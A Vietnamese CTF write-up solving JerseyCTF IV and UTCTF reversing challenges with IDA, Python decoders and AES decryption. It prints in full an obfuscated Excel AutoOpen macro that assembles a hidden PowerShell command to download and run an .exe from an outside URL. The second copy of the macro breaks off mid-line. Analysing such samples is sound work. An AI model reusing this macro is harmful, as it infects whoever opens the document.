WRITEUP JERSEYCTF

# WRITEUP JERSEYCTF IV & UTCTF ## I. Jersey CTF IV ### 1. PassWordManager * Quăng vào IDA phân tích tĩnh ![image](https://hackmd.io/_uploads/B1a-UFS1R.png) * Code khá rõ ràng ta đặt breakpoint và set IP để jump đến điều kiện `argc == 2` để lấy giá trị ra thôi ![image](https://hackmd.io/_uploads/S1tXsYSyC.png) > jctf{wh3r3s_m@y@?} ### 2. The heist 1 * Load chall vào IDA ![image](https://hackmd.io/_uploads/Sk25ACq1A.png) * Code khá rõ ràng, chương trình trên yêu cầu người dùng nhập một mã pin sau đó mã hóa bằng dịch trái 4 bit và xor với const `0x55` sau mỗi lần dịch, và cuối cùng so sánh với một hai `const_1` và `const_2` * Ta sẽ lấy dữ liệu từ hai const và brute để tìm được input mã hóa ban đầu ``` def rol_byte(value, shift): return ((value << shift) & 0xFF) | ((value & 0xFF) >> (8 - shift)) def decrypt_byte(target_byte): for char in brute_key: encrypted_byte = (rol_byte((~(ord(char) + 96)) & 0xFF, 4) ^ 0x55) if encrypted_byte == target_byte: return char return '' brute_key = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=<>,./{[]\|~:;?"\'' key = [0xC3, 0x83, 0x23, 0x23, 0xB3, 0xC3, 0x83, 0xE3, 0xA3, 0xE3, 0x33, 0x0C] flag = ''.join(decrypt_byte(byte) for byte in key) print(flag) ``` > jctf{62881624049} ### The heist 2 * File đã bị pack UPX ta sẽ tiến hành unpack `upx -d vaul_control.exe` và load vào IDA ![image](https://hackmd.io/_uploads/HyRVmm2yR.png) * Sau khi check sơ qua main ta có thể thấy được một số đặc điểm của AES trong chương trình như sau. Ban đầu ta cần nhập input sau đó input được lưu vào `Buffer` * Sau đó hàm `sub_140001000` là hàm key expension dùng để tạo khóa con từ key gốc là v17 * Để descrypt ta cần nhặt ra `key` và vector khởi tạo bằng cách trace từ hàm mã hóa AES và descrypt bằng mode CBC * Ta quan sát `sub_140001000` thì `v17` chính là key gốc tiền hành debug lấy ra ![image](https://hackmd.io/_uploads/BkQp3Q6kR.png) * Tiếp đến là vector ta thấy 16 byte dùng để xor với input ở loop ở `loc_7FF6DC3C1820` ![image](https://hackmd.io/_uploads/ByMQL4a1C.png) * Ta đã có đủ key cũng như vector và ciphertext, có thể descrypt bằng mode CBC ``` from Crypto.Cipher import AES deco = [0x5C, 0xA3, 0x41, 0xAB, 0x64, 0xBA, 0xCF, 0xC3, 0xD0, 0x61, 0x1E, 0x18, 0x56, 0xA3, 0x2D, 0x1E, 0xF6, 0x93, 0x87, 0x58, 0x09, 0x16, 0x8C, 0x63, 0x8C, 0x43, 0x2B, 0x9E, 0x6D, 0x73, 0x7F, 0xC5] iv = bytes.fromhex('697C742271495259527A77606F6A542D') key = bytes.fromhex("653C26273471785B3824637339767D61697C742271495259527A77606F6A542D")[:16] deco = bytes(deco) cipher = AES.new(key, AES.MODE_CBC, iv) plaintext = cipher.decrypt(deco) print(plaintext.decode('utf-8')) ``` > jctf{iLikE_M0ney$$$} ## II. UTCTF ### 1. BabyRev * Ta được 1 file ELF load vào IDA và check main như sau ![image](https://hackmd.io/_uploads/rk3Yu4p1A.png) * Ban đầu main chỉ call 1 hàm `keygen` ở trong thì keygen call liên tục các hàm từ `l1` đến `l19` đồng thồi gán `a1` cho 1 const hex nhất định ta chỉ cần nhặt const ra và decode thành tetx ``` 0x75, 0x74, 0x66, 0x6c, 0x61, 0x67, 0x7b, 0x69, 0x5f, 0x63, 0x34, 0x6e, 0x5f, 0x72, 0x33, 0x76, 0x21, 0x7d ``` > utflag{i_c4n_r3v!} ### 2. Fruit Deals * Ta được 1 file .xlsm có lẽ là 1 macro excel mình thử mở lên thì k thấy gì thú vị ![image](https://hackmd.io/_uploads/rkxTA46yA.png) * Có vẻ như việc mở đọc thông tin như này sẽ k được gì nên mình dùng olevba để đọc VBA của file ``` XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel) olevba 0.60.1 on Python 3.8.10 - http://decalage.info/python/oletools =============================================================================== FILE: deals.xlsm Type: OpenXML WARNING invalid value for PROJECTLCID_Id expected 0002 got 004A WARNING invalid value for PROJECTLCID_Lcid expected 0409 got 0005 WARNING invalid value for PROJECTLCIDINVOKE_Id expected 0014 got 0002 WARNING invalid value for PROJECTCODEPAGE_Id expected 0003 got 0014 WARNING invalid value for PROJECTCODEPAGE_Size expected 0002 got 0004 WARNING invalid value for PROJECTNAME_Id expected 0004 got 0000 ERROR PROJECTNAME_SizeOfProjectName value not in range [1-128]: 131075 ERROR Error in _extract_vba Traceback (most recent call last): File "/usr/local/lib/python3.8/dist-packages/oletools/olevba.py", line 3526, in extract_macros for stream_path, vba_filename, vba_code in \ File "/usr/local/lib/python3.8/dist-packages/oletools/olevba.py", line 2094, in _extract_vba project = VBA_Project(ole, vba_root, project_path, dir_path, relaxed) File "/usr/local/lib/python3.8/dist-packages/oletools/olevba.py", line 1752, in __init__ projectdocstring_id = struct.unpack("<H", dir_stream.read(2))[0] struct.error: unpack requires a buffer of 2 bytes ------------------------------------------------------------------------------- VBA MACRO ThisWorkbook in file: xl/vbaProject.bin - OLE stream: 'ThisWorkbook' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO Sheet1 in file: xl/vbaProject.bin - OLE stream: 'Sheet1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO Sheet2 in file: xl/vbaProject.bin - OLE stream: 'Sheet2' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO Module1 in file: xl/vbaProject.bin - OLE stream: 'Module1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub FillWithRandomBase64() Dim ws As Worksheet Dim rng As Range Dim i As Long Dim base64String As String ' Set worksheet Set ws = ThisWorkbook.Sheets("Sheet2") ' Change "Sheet1" to your sheet name ' Set range where you want to fill the base64 strings Set rng = ws.Range("A1:AA100") ' Change "A1:A100" to your desired range ' Clear previous content rng.ClearContents ' Seed the random number generator Randomize ' Loop through each cell in the range and fill with random base64 strings For i = 1 To rng.Cells.Count base64String = GenerateRandomBase64() rng.Cells(i).Value = base64String Next i End Sub Function GenerateRandomBase64() As String Dim base64Chars As String Dim i As Integer Dim base64String As String ' Define Base64 characters base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ' Generate random Base64 string For i = 1 To 8 ' Generates an 8-character Base64 string (which would correspond to 6 bytes of data) base64String = base64String & Mid(base64Chars, Int((Len(base64Chars) * Rnd) + 1), 1) Next i GenerateRandomBase64 = base64String End Function ------------------------------------------------------------------------------- VBA MACRO Module2 in file: xl/vbaProject.bin - OLE stream: 'Module2' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub AutoOpen() Dim Retval Dim f As String Dim t53df028c67b2f07f1069866e345c8b85, qe32cd94f940ea527cf84654613d4fb5d, e5b138e644d624905ca8d47c3b8a2cf41, tfd753b886f3bd1f6da1a84488dee93f9, z92ea38976d53e8b557cd5bbc2cd3e0f8, xc6fd40b407cb3aac0d068f54af14362e As String xc6fd40b407cb3aac0d068f54af14362e = "$OrA, " If Sheets("Sheet2").Range("M62").Value = "Iuzaz/iA" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "$jri);" End If If Sheets("Sheet2").Range("G80").Value = "bAcDPl8D" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "Invok" End If e5b138e644d624905ca8d47c3b8a2cf41 = " = '" If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "http" End If If Sheets("Sheet2").Range("B50").Value = "4L3bnaGQ" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "://f" End If If Sheets("Sheet2").Range("B32").Value = "QyycTMPU" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "e-Ite" End If If Sheets("Sheet2").Range("K47").Value = "0kIbOvsu" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "m $jri" End If If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + ";brea" End If If Sheets("Sheet2").Range("D27").Value = "y9hFUyA8" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "ruit" End If If Sheets("Sheet2").Range("A91").Value = "De5234dF" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".ret3" End If If Sheets("Sheet2").Range("I35").Value = "DP7jRT2v" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".gan" End If If Sheets("Sheet2").Range("W48").Value = "/O/w/o57" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "k;} c" End If If Sheets("Sheet2").Range("R18").Value = "FOtBe4id" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "atch " End If If Sheets("Sheet2").Range("W6").Value = "9Vo7IQ+/" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "{}""" End If If Sheets("Sheet2").Range("U24").Value = "hmDEjcAE" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "g/ma" End If If Sheets("Sheet2").Range("C96").Value = "1eDPj4Rc" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "lwar" End If If Sheets("Sheet2").Range("B93").Value = "A72nfg/f" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".rds8" End If If Sheets("Sheet2").Range("E90").Value = "HP5LRFms" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "e';$" End If tfd753b886f3bd1f6da1a84488dee93f9 = "akrz" If Sheets("Sheet2").Range("G39").Value = "MZZ/er++" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "f3zsd" End If If Sheets("Sheet2").Range("B93").Value = "ZX42cd+3" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2832" End If If Sheets("Sheet2").Range("I15").Value = "e9x9ME+E" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "0918" End If If Sheets("Sheet2").Range("T46").Value = "7b69F2SI" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2afd" End If If Sheets("Sheet2").Range("N25").Value = "Ga/NUmJu" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "CNTA" End If If Sheets("Sheet2").Range("N26").Value = "C1hrOgDr" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + " = '" End If If Sheets("Sheet2").Range("C58").Value = "PoX7qGEp" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "banA" End If If Sheets("Sheet2").Range("B53").Value = "see2d/f" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "Fl0dd" End If If Sheets("Sheet2").Range("Q2").Value = "VKVTo5f+" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "NA-H" End If t53df028c67b2f07f1069866e345c8b85 = "p" If Sheets("Sheet2").Range("L84").Value = "GSPMnc83" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "oWe" End If If Sheets("Sheet2").Range("H35").Value = "aCxE//3x" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "ACew" End If If Sheets("Sheet2").Range("R95").Value = "uIDW54Re" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "Rs" End If If Sheets("Sheet2").Range("A24").Value = "PKRtszin" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "HELL" End If If Sheets("Sheet2").Range("G33").Value = "ccEsz3te" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "L3c33" End If If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + " -c" End If If Sheets("Sheet2").Range("Z49").Value = "oKnlcgpo" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "4';$" End If If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "jri=" End If If Sheets("Sheet2").Range("M37").Value = "y7MxjsAO" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "$env:" End If If Sheets("Sheet2").Range("E20").Value = "ap0EvV5r" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "publ" End If z92ea38976d53e8b557cd5bbc2cd3e0f8 = "\'+$" If Sheets("Sheet2").Range("D11").Value = "Q/GXajeM" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "CNTA" End If If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "+'.ex" End If If Sheets("Sheet2").Range("D85").Value = "y4/6D38p" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "e';tr" End If If Sheets("Sheet2").Range("P2").Value = "E45tTsBe" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "4d2dx" End If If Sheets("Sheet2").Range("O72").Value = "lD3Ob4eQ" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "ic+'" End If qe32cd94f940ea527cf84654613d4fb5d = "omm" If Sheets("Sheet2").Range("P24").Value = "d/v8oiH9" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "and" End If If Sheets("Sheet2").Range("V22").Value = "dI6oBK/K" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " """ End If If Sheets("Sheet2").Range("G1").Value = "zJ1AdN0x" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$oa" End If If Sheets("Sheet2").Range("Y93").Value = "E/5234dF" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "e$3fn" End If If Sheets("Sheet2").Range("A12").Value = "X42fc3/=" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "av3ei" End If If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "K =" End If If Sheets("Sheet2").Range("L99").Value = "t8PygQka" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " ne" End If If Sheets("Sheet2").Range("X31").Value = "gGJBD5tp" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "w-o" End If If Sheets("Sheet2").Range("C42").Value = "Dq7Pu9Tm" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bjec" End If If Sheets("Sheet2").Range("D22").Value = "X42/=rrE" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "aoX3&i" End If If Sheets("Sheet2").Range("T34").Value = "9u2uF9nM" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "t Ne" End If If Sheets("Sheet2").Range("G5").Value = "cp+qRR+N" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "t.We" End If If Sheets("Sheet2").Range("O17").Value = "Q8z4cV/f" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bCli" End If If Sheets("Sheet2").Range("Y50").Value = "OML7UOYq" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "ent;" End If If Sheets("Sheet2").Range("P41").Value = "bG9LxJvN" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$OrA" End If If Sheets("Sheet2").Range("L58").Value = "qK02fT5b" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "y{$oa" End If If Sheets("Sheet2").Range("P47").Value = "hXelsG2H" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "K.Dow" End If If Sheets("Sheet2").Range("A2").Value = "RcPl3722" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "Ry.is" End If If Sheets("Sheet2").Range("G64").Value = "Kvap5Ma0" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "nload" End If If Sheets("Sheet2").Range("H76").Value = "OjgR3YGk" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "File(" End If f = t53df028c67b2f07f1069866e345c8b85 + qe32cd94f940ea527cf84654613d4fb5d + e5b138e644d624905ca8d47c3b8a2cf41 + tfd753b886f3bd1f6da1a84488dee93f9 + z92ea38976d53e8b557cd5bbc2cd3e0f8 + xc6fd40b407cb3aac0d068f54af14362e Retval = Shell(f, 0) Dim URL As String URL = "https://www.youtube.com/watch?v=mYiBdMnIT88" ActiveWorkbook.FollowHyperlink URL End Sub ------------------------------------------------------------------------------- VBA MACRO Sheet3 in file: xl/vbaProject.bin - OLE stream: 'Sheet3' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) +----------+--------------------+---------------------------------------------+ |Type |Keyword |Description | +----------+--------------------+---------------------------------------------+ |AutoExec |AutoOpen |Runs when the Word document is opened | |Suspicious|Shell |May run an executable file or a system | | | |command | |Suspicious|Hex Strings |Hex-encoded strings were detected, may be | | | |used to obfuscate strings (option --decode to| | | |see all) | |Suspicious|Base64 Strings |Base64-encoded strings were detected, may be | | | |used to obfuscate strings (option --decode to| | | |see all) | |IOC |https://www.youtube.|URL | | |com/watch?v=mYiBdMnI| | | |T88 | | |Base64 |l)b |bCli | |String | | | +----------+--------------------+---------------------------------------------+ ``` * Code khá dài nhưng ta chỉ cần chú ý đến hàm `AutoOpen()` và check vòng lặp ``` Sub AutoOpen() Dim Retval Dim f As String Dim t53df028c67b2f07f1069866e345c8b85, qe32cd94f940ea527cf84654613d4fb5d, e5b138e644d624905ca8d47c3b8a2cf41, tfd753b886f3bd1f6da1a84488dee93f9, z92ea38976d53e8b557cd5bbc2cd3e0f8, xc6fd40b407cb3aac0d068f54af14362e As String xc6fd40b407cb3aac0d068f54af14362e = "$OrA, " If Sheets("Sheet2").Range("M62").Value = "Iuzaz/iA" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "$jri);" End If If Sheets("Sheet2").Range("G80").Value = "bAcDPl8D" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "Invok" End If e5b138e644d624905ca8d47c3b8a2cf41 = " = '" If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "http" End If If Sheets("Sheet2").Range("B50").Value = "4L3bnaGQ" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "://f" End If If Sheets("Sheet2").Range("B32").Value = "QyycTMPU" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "e-Ite" End If If Sheets("Sheet2").Range("K47").Value = "0kIbOvsu" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "m $jri" End If If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + ";brea" End If If Sheets("Sheet2").Range("D27").Value = "y9hFUyA8" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "ruit" End If If Sheets("Sheet2").Range("A91").Value = "De5234dF" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".ret3" End If If Sheets("Sheet2").Range("I35").Value = "DP7jRT2v" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".gan" End If If Sheets("Sheet2").Range("W48").Value = "/O/w/o57" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "k;} c" End If If Sheets("Sheet2").Range("R18").Value = "FOtBe4id" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "atch " End If If Sheets("Sheet2").Range("W6").Value = "9Vo7IQ+/" Then xc6fd40b407cb3aac0d068f54af14362e = xc6fd40b407cb3aac0d068f54af14362e + "{}""" End If If Sheets("Sheet2").Range("U24").Value = "hmDEjcAE" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "g/ma" End If If Sheets("Sheet2").Range("C96").Value = "1eDPj4Rc" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "lwar" End If If Sheets("Sheet2").Range("B93").Value = "A72nfg/f" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + ".rds8" End If If Sheets("Sheet2").Range("E90").Value = "HP5LRFms" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "e';$" End If tfd753b886f3bd1f6da1a84488dee93f9 = "akrz" If Sheets("Sheet2").Range("G39").Value = "MZZ/er++" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "f3zsd" End If If Sheets("Sheet2").Range("B93").Value = "ZX42cd+3" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2832" End If If Sheets("Sheet2").Range("I15").Value = "e9x9ME+E" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "0918" End If If Sheets("Sheet2").Range("T46").Value = "7b69F2SI" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "2afd" End If If Sheets("Sheet2").Range("N25").Value = "Ga/NUmJu" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "CNTA" End If If Sheets("Sheet2").Range("N26").Value = "C1hrOgDr" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + " = '" End If If Sheets("Sheet2").Range("C58").Value = "PoX7qGEp" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "banA" End If If Sheets("Sheet2").Range("B53").Value = "see2d/f" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "Fl0dd" End If If Sheets("Sheet2").Range("Q2").Value = "VKVTo5f+" Then e5b138e644d624905ca8d47c3b8a2cf41 = e5b138e644d624905ca8d47c3b8a2cf41 + "NA-H" End If t53df028c67b2f07f1069866e345c8b85 = "p" If Sheets("Sheet2").Range("L84").Value = "GSPMnc83" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "oWe" End If If Sheets("Sheet2").Range("H35").Value = "aCxE//3x" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "ACew" End If If Sheets("Sheet2").Range("R95").Value = "uIDW54Re" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "Rs" End If If Sheets("Sheet2").Range("A24").Value = "PKRtszin" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "HELL" End If If Sheets("Sheet2").Range("G33").Value = "ccEsz3te" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + "L3c33" End If If Sheets("Sheet2").Range("P31").Value = "aI3bH4Rd" Then t53df028c67b2f07f1069866e345c8b85 = t53df028c67b2f07f1069866e345c8b85 + " -c" End If If Sheets("Sheet2").Range("Z49").Value = "oKnlcgpo" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "4';$" End If If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "jri=" End If If Sheets("Sheet2").Range("M37").Value = "y7MxjsAO" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "$env:" End If If Sheets("Sheet2").Range("E20").Value = "ap0EvV5r" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "publ" End If z92ea38976d53e8b557cd5bbc2cd3e0f8 = "\'+$" If Sheets("Sheet2").Range("D11").Value = "Q/GXajeM" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "CNTA" End If If Sheets("Sheet2").Range("B45").Value = "/hRdSmbG" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "+'.ex" End If If Sheets("Sheet2").Range("D85").Value = "y4/6D38p" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "e';tr" End If If Sheets("Sheet2").Range("P2").Value = "E45tTsBe" Then z92ea38976d53e8b557cd5bbc2cd3e0f8 = z92ea38976d53e8b557cd5bbc2cd3e0f8 + "4d2dx" End If If Sheets("Sheet2").Range("O72").Value = "lD3Ob4eQ" Then tfd753b886f3bd1f6da1a84488dee93f9 = tfd753b886f3bd1f6da1a84488dee93f9 + "ic+'" End If qe32cd94f940ea527cf84654613d4fb5d = "omm" If Sheets("Sheet2").Range("P24").Value = "d/v8oiH9" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "and" End If If Sheets("Sheet2").Range("V22").Value = "dI6oBK/K" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " """ End If If Sheets("Sheet2").Range("G1").Value = "zJ1AdN0x" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "$oa" End If If Sheets("Sheet2").Range("Y93").Value = "E/5234dF" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "e$3fn" End If If Sheets("Sheet2").Range("A12").Value = "X42fc3/=" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "av3ei" End If If Sheets("Sheet2").Range("F57").Value = "JoTVytPM" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "K =" End If If Sheets("Sheet2").Range("L99").Value = "t8PygQka" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + " ne" End If If Sheets("Sheet2").Range("X31").Value = "gGJBD5tp" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "w-o" End If If Sheets("Sheet2").Range("C42").Value = "Dq7Pu9Tm" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "bjec" End If If Sheets("Sheet2").Range("D22").Value = "X42/=rrE" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "aoX3&i" End If If Sheets("Sheet2").Range("T34").Value = "9u2uF9nM" Then qe32cd94f940ea527cf84654613d4fb5d = qe32cd94f940ea527cf84654613d4fb5d + "t Ne" End If If Sheets("Sheet2").Range("G5").Value = "cp+qRR+N" Then qe32cd94f940ea527cf84654613d4fb5d = 